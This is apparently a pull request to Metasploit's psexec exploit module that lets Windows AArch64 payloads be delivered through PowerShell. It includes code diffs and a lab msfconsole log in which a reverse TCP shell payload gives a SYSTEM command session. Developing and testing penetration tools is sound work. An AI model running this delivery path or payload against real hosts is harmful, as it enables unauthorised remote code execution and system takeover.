### PR TITLE
Enable psexec PowerShell delivery for Windows AArch64 payloads

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -104,7 +104,7 @@ PATH
       rex-mime
       rex-nop
       rex-ole
-      rex-powershell
+      rex-powershell (>= 0.1.105)
       rex-random_identifier
       rex-registry
       rex-rop_builder
@@ -538,7 +538,7 @@ GEM
       rex-arch
     rex-ole (0.1.9)
       rex-text
-    rex-powershell (0.1.103)
+    rex-powershell (0.1.105)
       bigdecimal
       rex-random_identifier
       rex-text

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -171,7 +171,7 @@ Gem::Specification.new do |spec|
   # Library for Generating Randomized strings valid as Identifiers such as variable names
   spec.add_runtime_dependency 'rex-random_identifier'
   # library for creating Powershell scripts for exploitation purposes
-  spec.add_runtime_dependency 'rex-powershell'
+  spec.add_runtime_dependency 'rex-powershell', '>= 0.1.105'
   # Library for processing and creating Zip compatbile archives
   spec.add_runtime_dependency 'rex-zip'
   # Library for parsing offline Windows Registry files

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -66,11 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => 'win',
         'Targets' => [
-          # PowerShell isn't offered for AArch64: the PowerShell shellcode-injection
-          # wrapper (rex-powershell) only knows how to spawn x86/x64 powershell.exe,
-          # so it can't be used to run AArch64 shellcode.
           [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
-          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
           [ 'Native upload', { # upload a service executable
             'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
             # service executables place the payload within a segment, 1GiB is a practical max in many cases.
@@ -159,12 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when 'Automatic'
-      # The PowerShell delivery path can only launch x86/x64 powershell.exe, so
-      # an AArch64 payload has to go straight to the native upload technique.
-      if payload_instance.arch.include?(ARCH_AARCH64)
-        print_status('Selecting native target')
-        native_upload_with_workaround(smbshare)
-      elsif powershell_installed?(smbshare, datastore['PSH_PATH'])
+      if powershell_installed?(smbshare, datastore['PSH_PATH'])
         print_status('Selecting PowerShell target')
         execute_powershell_payload
       else


### PR DESCRIPTION
## Summary

Follow-up to #21779 and [rapid7/rex-powershell#49](https://github.com/rapid7/rex-powershell/pull/49) (`rex-powershell` 0.1.105).

#21779 wired AArch64 into psexec **Native upload** (drop an EXE) and left the PowerShell target on x86/x64 only, because `run_hidden_psh` could not pick the ARM64 `powershell.exe`. That gem now routes WoA hosts via `PROCESSOR_ARCHITECTURE` / `PROCESSOR_ARCHITEW6432`.

This PR:

- Requires `rex-powershell >= 0.1.105`.
- Adds `ARCH_AARCH64` to the PowerShell target.
- Drops the Automatic-branch detour that forced AArch64 payloads onto Native upload. If `powershell.exe` is on the share, Automatic now selects PowerShell for AArch64 the same way it does for x86/x64.

Native upload is unchanged and still available for payloads that do not fit the 8192-byte AArch64 template.

## Verification

Windows 11 ARM64 VM (build 26200), local admin, `windows/aarch64/shell_reverse_tcp`.

### Automatic (`target 0`)

```
msf exploit(windows/smb/psexec) > set payload windows/aarch64/shell_reverse_tcp
msf exploit(windows/smb/psexec) > set target 0
msf exploit(windows/smb/psexec) > set verbose true
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.0.164:4444
[*] 127.0.0.1:445 - Connecting to the server...
[*] 127.0.0.1:445 - Authenticating to 127.0.0.1:445 as user 'user'...
[!] 127.0.0.1:445 - No active DB -- Credential data will not be saved!
[*] 127.0.0.1:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 127.0.0.1:445 - PowerShell found
[*] 127.0.0.1:445 - Selecting PowerShell target
[*] 127.0.0.1:445 - Powershell command length: 4905
[*] 127.0.0.1:445 - Executing the payload...
[*] 127.0.0.1:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:127.0.0.1[\svcctl] ...
[*] 127.0.0.1:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:127.0.0.1[\svcctl] ...
[*] 127.0.0.1:445 - Obtaining a service manager handle...
[*] 127.0.0.1:445 - Creating the service...
[+] 127.0.0.1:445 - Successfully created the service
[*] 127.0.0.1:445 - Starting the service...
[+] 127.0.0.1:445 - Service start timed out, OK if running a command or non-service executable...
[*] 127.0.0.1:445 - Removing the service...
[+] 127.0.0.1:445 - Successfully removed the service
[*] 127.0.0.1:445 - Closing service handle...
[*] Command shell session 1 opened (192.168.0.164:4444 -> 192.168.0.164:51876) at 2026-08-31 23:46:59 -0300


Shell Banner:
Microsoft Windows [Version 10.0.26200.8875]
-----


C:\Windows\System32>whoami
nt authority\system

C:\Windows\System32>hostname
Windows
```

Before this change, Automatic with the same payload printed `Selecting native target`.

### Explicit PowerShell (`target 1`)

Same payload/options, `set target 1`: command length 4914, same SCM timeout message, session 2 opened.

## Test plan

- [x] Automatic + `windows/aarch64/shell_reverse_tcp` selects PowerShell and opens a SYSTEM session on Windows 11 ARM64.
- [x] Explicit PowerShell target (`target 1`) with the same payload also opens a session.
- [ ] x64/x86 Automatic still prefers PowerShell when `powershell.exe` is present (unchanged control flow).


Made with [Cursor](https://cursor.com)